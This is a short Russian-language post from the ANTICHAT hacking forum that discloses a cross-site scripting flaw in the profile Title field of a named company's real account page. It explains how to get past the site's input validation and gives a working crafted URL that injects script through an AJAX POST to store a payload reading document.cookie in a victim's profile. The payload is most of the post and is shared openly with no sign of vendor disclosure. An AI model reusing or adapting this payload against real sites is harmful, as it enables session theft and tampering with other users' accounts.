ANTICHAT Forum
HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
НОВЫЕ ТОРГОВАЯ НОВОСТИ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #23  
Старый 27.11.2015, 23:51
dejaview
Новичок
Регистрация: 27.11.2015
Сообщений: 1
С нами: 5506166

Репутация: 0
По умолчанию

тиц/пр:550/6

url:https://www.veeam.com/account-edit-profile.html

Код:
alert(123);
Уязвимое поле - Title, но через инпут не записать, так как валидация. XSRF тоже не провести, так как xmlhttprequest.

Так что, если сам себе - подменяем запрос. Ну, а злоумышленник может записать жертве через пассивку -

Код:
https://www.veeam.com/inj.html";a="script";$.ajax(%7Btype:"POST",url:"/change_field/",data:"val=injectedalert(document.cookie);%7Cjob_description%7CR%2CSymbol%2CMax",dataType:"json",async:!1%7D);window.location="/account-edit-profile.html"
 
Ответить с цитированием
 



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss для новичков Micr0b Уязвимости 79 06.07.2018 22:05
Xss bx_N Forum for discussion of ANTICHAT 7 11.03.2007 19:17
mylivepage.ru активные XSS __XT__ Уязвимости 3 23.12.2006 14:31



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.